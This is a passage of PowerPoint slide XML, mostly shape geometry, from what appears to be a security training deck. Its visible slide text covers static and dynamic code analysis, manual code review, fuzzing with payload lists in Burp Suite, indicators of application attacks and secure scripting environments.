                  <a:pt x="5982132" y="2123769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5940307" y="2144758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5895611" y="2160284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5848473" y="2169917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5799328" y="2173224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="362203" y="2173224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313058" y="2169917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265920" y="2160284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221224" y="2144758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179399" y="2123769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140878" y="2097749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106092" y="2067131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75474" y="2032345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49454" y="1993824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28465" y="1951999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12939" y="1907303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3306" y="1860165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1811020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="362203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364994" y="4878475"/>
            <a:ext cx="4324985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38200" marR="5080" indent="-826135">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Code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bm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nal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by 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automated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software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09444" y="3704844"/>
            <a:ext cx="4410710" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="984885">
                <a:moveTo>
                  <a:pt x="4246372" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164083" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372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648204" y="4001516"/>
            <a:ext cx="3932554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Static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FFFFFF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Source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Code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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Analysis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70214" y="4229861"/>
            <a:ext cx="6162040" cy="2170430"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6162040" h="2170429">
                <a:moveTo>
                  <a:pt x="0" y="361696"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3301" y="312613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12919" y="265538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28422" y="220902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49379" y="179135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75360" y="140669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105933" y="105933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140669" y="75360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179135" y="49379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220902" y="28422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265538" y="12919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312613" y="3301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361695" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5799835" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5848918" y="3301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5895993" y="12919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5940629" y="28422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5982396" y="49379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6020862" y="75360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6055598" y="105933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6086171" y="140669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6112152" y="179135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6133109" y="220902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148612" y="265538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158230" y="312613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="361696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="1808480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158230" y="1857562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148612" y="1904637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6133109" y="1949273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6112152" y="1991040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6086171" y="2029506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6055598" y="2064242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6020862" y="2094815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5982396" y="2120796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5940629" y="2141753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5895993" y="2157256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5848918" y="2166874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5799835" y="2170176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361695" y="2170176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312613" y="2166874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265538" y="2157256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220902" y="2141753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179135" y="2120796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140669" y="2094815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105933" y="2064242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75360" y="2029506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49379" y="1991040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28422" y="1949273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12919" y="1904637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3301" y="1857562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1808480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="361696"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="EE63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9417177" y="5118303"/>
            <a:ext cx="451802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ource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cod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ana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yzed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by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man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557004" y="3707891"/>
            <a:ext cx="4410710" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="984885">
                <a:moveTo>
                  <a:pt x="4246372" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164084" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164084" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372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0395331" y="4004310"/>
            <a:ext cx="273494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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Man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5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3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Code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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Re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iew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72632" y="306451"/>
            <a:ext cx="41097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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-8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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Analysis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15128" y="760476"/>
            <a:ext cx="590397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08679" y="1933193"/>
            <a:ext cx="984123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dynamic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code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analysis,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application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is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tested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using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staging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environment.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70020" y="2695955"/>
            <a:ext cx="8394700" cy="1275715"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8394700" h="1275714">
                <a:moveTo>
                  <a:pt x="8181594" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="212597" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163832" y="5611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119076" y="21598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79603" y="46686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46686" y="79603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21598" y="119076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5611" y="163832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="212598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1062990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5611" y="1111755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21598" y="1156511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46686" y="1195984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79603" y="1228901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119076" y="1253989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163832" y="1269976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212597" y="1275588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8181594" y="1275588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8230359" y="1269976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8275115" y="1253989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8314588" y="1228901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8347505" y="1195984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8372593" y="1156511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8388580" y="1111755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8394191" y="1062990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8394191" y="212598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8388580" y="163832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8372593" y="119076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8347505" y="79603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8314588" y="46686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8275115" y="21598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8230359" y="5611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8181594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126229" y="2899688"/>
            <a:ext cx="8076565" cy="79057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70"/>
              </a:spcBef>
            </a:pP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235">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>z</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-229">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>z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7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an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str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8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7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55">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>sti</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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7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5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dynam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22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cod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analy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6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2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="1270">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
            </a:pP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2200" spc="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ways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60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ject</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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man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60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>pu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3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put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60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cl</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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55">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>des: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28896" y="7083297"/>
            <a:ext cx="183959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Appl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cati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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>UI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67009" y="7083297"/>
            <a:ext cx="111633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Protocol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35393" y="4579111"/>
            <a:ext cx="143446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F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le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fo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mat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027420" y="4991100"/>
            <a:ext cx="4053840" cy="2626360"/>
            <a:chOff x="6027420" y="4991100"/>
            <a:chExt cx="4053840" cy="262636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27420" y="4991100"/>
              <a:ext cx="4053839" cy="262585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71232" y="6001511"/>
              <a:ext cx="973835" cy="9738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74845" y="4258436"/>
            <a:ext cx="7309484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45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Analyze</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Indicators</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks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72632" y="306451"/>
            <a:ext cx="41097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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-8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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Analysis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0764" y="760476"/>
            <a:ext cx="5615940" cy="3657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24984" y="2545079"/>
            <a:ext cx="7011923" cy="591769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096516" y="1933193"/>
            <a:ext cx="1246505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image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below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shows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loading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list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strings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payload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fuzzing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test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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Burp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Suite.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50485" y="4258436"/>
            <a:ext cx="69564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50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Implement</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Environments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31456" y="306451"/>
            <a:ext cx="15951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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Scripting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75347" y="760476"/>
            <a:ext cx="2267711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45742" y="1933193"/>
            <a:ext cx="1316672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Automation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activity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performed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through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programs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scripts.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script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uses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following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elements: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436617" y="3195320"/>
            <a:ext cx="2433955" cy="4551680"/>
            <a:chOff x="4436617" y="3195320"/>
            <a:chExt cx="2433955" cy="4551680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4436617" y="3195320"/>
              <a:ext cx="2290445" cy="4551680"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="72136" y="4408932"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="44529" y="4415256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22256" y="4431141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7556" y="4454241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2667" y="4482210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8991" y="4509817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24876" y="4532090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47976" y="4546790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75946" y="4551680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103552" y="4545355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125825" y="4529470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140525" y="4506370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142595" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74422" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73660" y="4466082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139090" y="4450794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123205" y="4428521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100105" y="4413821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72136" y="4408932"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73660" y="4466082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74422" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145415" y="4478401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74422" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142595" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="140239" y="58837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142748" y="73151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184404" y="88518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295656" y="96900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405257" y="110997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513207" y="130175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619125" y="154685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723138" y="184276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824865" y="218693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924179" y="257937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021207" y="301751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115695" y="350138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1207389" y="402970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296162" y="459866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382141" y="520953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1464818" y="585977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544320" y="654812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620393" y="727455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692910" y="803528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761617" y="882903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826641" y="965707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887728" y="1051559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944751" y="1140459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997456" y="1232153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045716" y="1326641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089531" y="1423669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128774" y="1523110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="1624964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192655" y="1728851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217166" y="1834768"/>
